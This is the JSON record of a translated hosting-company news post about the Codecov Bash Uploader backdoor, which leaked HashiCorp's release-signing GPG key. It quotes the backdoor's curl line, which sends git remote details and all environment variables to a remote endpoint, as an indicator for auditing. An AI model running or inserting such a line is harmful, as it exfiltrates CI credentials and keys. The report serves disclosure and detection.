{"id":100037,"date":"2021-04-27T10:22:34","date_gmt":"2021-04-27T08:22:34","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp"},"modified":"2021-04-27T10:22:34","modified_gmt":"2021-04-27T08:22:34","slug":"vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp","status":"publish","type":"post","link":"https:\/\/prohoster.info\/en\/blog\/news\/vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp","title":{"rendered":"The injection of malicious code into the Codecov script compromised the HashiCorp PGP key.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>HashiCorp, known for developing open-source tools like Vagrant, Packer, Nomad, and Terraform, has announced a leak of a private GPG key used for creating digital signatures that verify releases. Attackers who gained access to the GPG key potentially could have made hidden changes to HashiCorp products, certifying them with a valid digital signature. However, the company stated that an audit found no evidence of attempts to make such modifications.     <\/p>\n<p> Currently, the compromised GPG key has been revoked and a new key has been introduced in its place. The issue only affected verification using SHA256SUM and SHA256SUM.sig files and did not impact the digital signature generation for DEB and RPM Linux packages provided through releases.hashicorp.com, nor the release validation mechanisms for macOS and Windows (AuthentiCode).    <\/p>\n<p>The leak occurred due to the use of the Codecov Bash Uploader script (codecov-bash) in the infrastructure, which is intended for uploading coverage reports from continuous integration systems. During an attack on Codecov, a backdoor was secretly embedded into this script, which facilitated the transmission of passwords and encryption keys. <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/en\/server\/\"   title=\"server\" data-wpil-keyword-link=\"linked\">server<\/a> attacker's server.       <\/p>\n<p>To exploit the situation, attackers took advantage of a vulnerability in the Codecov Docker image creation process, which allowed them to extract data required to access GCS (Google Cloud Storage) and make changes to the Bash Uploader script distributed from codecov.io. The changes were made on January 31 and went unnoticed for two months, allowing the perpetrators to extract information stored in the continuous integration environments of clients. With the added malicious code, they could access information about the tested Git repository and all environment variables, including tokens, encryption keys, and passwords transmitted to continuous integration systems for accessing application code, repositories, and services such as Amazon Web Services and GitHub.      <\/p>\n<p>In addition to direct calls, the Codecov Bash Uploader script has been used as part of other uploaders, such as Codecov-action (Github), Codecov-circleci-orb, and Codecov-bitrise-step, whose users are also affected by the issue. All users of codecov-bash and related products are advised to audit their infrastructures, as well as change passwords and encryption keys. You can check for a backdoor in the script by looking for the line curl -sm 0.5 -d \"$(git remote -v)&lt;&lt;&lt; ENV $(env)&quot; http:\/\/\/upload\/v2 || true<br \/>\n<br \/>Source: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55032\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f HashiCorp, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0435\u0432 Vagrant, Packer, Nomad \u0438 Terraform, \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e\u0431 \u0443\u0442\u0435\u0447\u043a\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u043e\u0433\u043e GPG-\u043a\u043b\u044e\u0447\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u043f\u043e\u0434\u043f\u0438\u0441\u0435\u0439, \u0432\u0435\u0440\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0440\u0435\u043b\u0438\u0437\u044b. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a GPG-\u043a\u043b\u044e\u0447\u0443, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0433\u043b\u0438 \u0432\u043d\u0435\u0441\u0442\u0438 \u0441\u043a\u0440\u044b\u0442\u044b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b HashiCorp, \u0437\u0430\u0432\u0435\u0440\u0438\u0432 \u0438\u0445 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0439 \u043f\u043e\u0434\u043f\u0438\u0441\u044c\u044e. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0432 \u0445\u043e\u0434\u0435 \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0433\u043e \u0430\u0443\u0434\u0438\u0442\u0430 \u0441\u043b\u0435\u0434\u043e\u0432 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0432\u043d\u0435\u0441\u0435\u043d\u0438\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100037","post","type-post","status-publish","format-standard","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f HashiCorp, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0435\u0432 Vagrant, Packer, Nomad \u0438 Terraform, \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e\u0431 \u0443\u0442\u0435\u0447\u043a\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u043e\u0433\u043e GPG-\u043a\u043b\u044e\u0447\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u043f\u043e\u0434\u043f\u0438\u0441\u0435\u0439, \u0432\u0435\u0440\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0440\u0435\u043b\u0438\u0437\u044b.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/en\/blog\/news\/vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0412\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 \u0441\u043a\u0440\u0438\u043f\u0442 Codecov \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 PGP-\u043a\u043b\u044e\u0447\u0430 HashiCorp | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f HashiCorp, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0435\u0432 Vagrant, Packer, Nomad \u0438 Terraform, \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e\u0431 \u0443\u0442\u0435\u0447\u043a\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u043e\u0433\u043e GPG-\u043a\u043b\u044e\u0447\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u043f\u043e\u0434\u043f\u0438\u0441\u0435\u0439, \u0432\u0435\u0440\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0440\u0435\u043b\u0438\u0437\u044b.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/en\/blog\/news\/vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-04-27T08:22:34+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2021-04-27T08:22:34+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47The injection of malicious code into the Codecov script led to the compromise of HashiCorp's PGP key | ProHoster","description":"HashiCorp, a company known for developing open-source tools such as Vagrant, Packer, Nomad, and Terraform, has announced a leak of a private GPG key used for creating digital signatures that verify releases.","canonical_url":"https:\/\/prohoster.info\/en\/blog\/news\/vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"en_US","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0412\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 \u0441\u043a\u0440\u0438\u043f\u0442 Codecov \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 PGP-\u043a\u043b\u044e\u0447\u0430 HashiCorp | ProHoster","og:description":"\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f HashiCorp, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0435\u0432 Vagrant, Packer, Nomad \u0438 Terraform, \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e\u0431 \u0443\u0442\u0435\u0447\u043a\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u043e\u0433\u043e GPG-\u043a\u043b\u044e\u0447\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u043f\u043e\u0434\u043f\u0438\u0441\u0435\u0439, \u0432\u0435\u0440\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0440\u0435\u043b\u0438\u0437\u044b.","og:url":"https:\/\/prohoster.info\/en\/blog\/news\/vnedrenie-vredonosnogo-koda-v-skript-codecov-privelo-k-komprometaczii-pgp-klyucha-hashicorp","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-04-27T08:22:34+00:00","article:modified_time":"2021-04-27T08:22:34+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100037","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-04-27 08:40:28","updated":"2022-10-05 15:50:09","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts\/100037","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/comments?post=100037"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts\/100037\/revisions"}],"predecessor-version":[{"id":172925,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts\/100037\/revisions\/172925"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/media?parent=100037"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/categories?post=100037"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/tags?post=100037"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}